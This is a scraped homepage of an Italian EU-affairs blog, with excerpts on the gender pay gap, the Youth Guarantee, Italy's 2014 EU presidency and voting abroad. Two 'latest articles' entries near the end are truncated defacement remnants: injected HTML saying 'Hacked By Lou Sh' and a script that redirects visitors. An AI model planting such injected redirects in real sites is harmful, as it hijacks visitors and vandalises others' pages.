EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Gennaio 2014
it

Il 9 dicembre la Commissione europea ha pubblicato una relazione che traccia un bilancio circa l’attuale atteggiamento degli Stati membri in materia di parità tra i sessi in ambito retributivo. Il dato evidenziato è la percentuale ancora troppo elevata del gender pay gap, ovvero della differenza che intercorre tra le modalità di retribuzione attuate per gli uomini e quelle utilizzate per le donne. Il bilancio dimostra che il divario è diminuito del 1.1% tra il 2008 e il 2011, arrestandosi al 16.2%. Tale percentuale è rimasta invariata rispetto all’anno scorso e questo testimonia quanto la disparità di retribuzione tra i sessi sia ancora un problema su cui l’UE deve lavorare.

Le aziende private e pubbliche, gli enti, le istituzioni stentano ancora a rendere effettivo il principio di parità. Eppure, l’Unione europea ha dedicato da sempre molte attenzioni a questo argomento, considerato come uno dei suoi principi fondanti. Infatti, l’articolo 199 del trattato del marzo (...)

it

Il primo luglio 2014 l’Italia assumerà la Presidenza del Consiglio dell’Unione europea: sei mesi per dirigere l’agenda europea, discutere le priorità e raggiungere conclusioni in un’Europa rinforzata dalle elezioni del prossimo maggio.

Sei mesi che, se condivisi e sfruttati da tutti gli italiani bruxellesi, riusciranno a promuovere la presidenza italiana e l’Italia attraverso la proposizione e realizzazione di idee e contenuti concreti, realizzabili con un investimento minimo di denaro, consapevoli che mettendo insieme le (...)

it

Sono 17 gli Stati membri che hanno già presentato alla Commissione europea i loro piani definitivi per attuare la Garanzia per i Giovani, ambizioso programma dell’Unione europea per rispondere alla crisi dell’occupazione giovanile.

Belgio, Bulgaria, Croazia, Cipro, Repubblica Ceca, Francia, Grecia, Ungheria, Irlanda, Italia, Lettonia, Lituania, Polonia, Portogallo, Romania, Spagna e Svezia hanno presentato le road maps per l’implementazione della Youth Guarantee. La Commissione europea sta attualmente valutando i piani e (...)

it

In 2013, the United Nations did something unprecedented. It set up the UN Major Group for Children and Youth (MGCY) Policy Strategy Group. This Policy Strategy Group’s goal is to help define the World We Want Consultations on post-2015. In 2015 a global development plan called Millennium Development Goals (MDGs) will expire and governments around the world will develop a new plan to define the world’s next global development agenda set to begin in 2015

The UN Major Group for Children and Youth is a voice of children and youth and is aimed at youth bellow the age of 30 as a platform to amplify youth voices in the new development agenda. As a youth I have been very interested in listening to the voices of my peers as expressed on the UN (...)

it

La possibilità da parte dei lavoratori di potersi spostare è precondizione per un’elevata crescita e un’elevata attività a livello lavorativo in tutta Europa. Proprio grazie a questi spostamenti e all’ampliamento dell’Ue dal 2004 al 2009, le stime rilevano una crescita del PIL dell’Ue-15 dell’1%. Per questo la Commissione vuole controllare le regole fiscali previste dagli Stati membri.

Spesso sono proprio le difficoltà fiscali ad impedire ai cittadini l’abbandono della propria terra natia per poter cercare occupazione in uno Stato membro diverso dal loro. Per questo, la Commissione europea analizzerà l’aggravio fiscale previsto da ogni Stato membro per valutare se e quanto i (...)

it

Da giovedì 22 a domenica 25 maggio 2014 i cittadini europei saranno chiamati alle urne per rinnovare la componente che rappresenterà l'Italia all'Europarlamento per i prossimi cinque anni.

Per gli italiani che in quelle date saranno al di fuori del loro Stato di provenienza per motivi di lavoro, studio o per qualsiasi altro motivo che prevede un soggiorno solo temporaneo, il Ministero dell’Interno ha elencato le direttive alle quali i soggetti dovranno attenersi per far sì che il (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France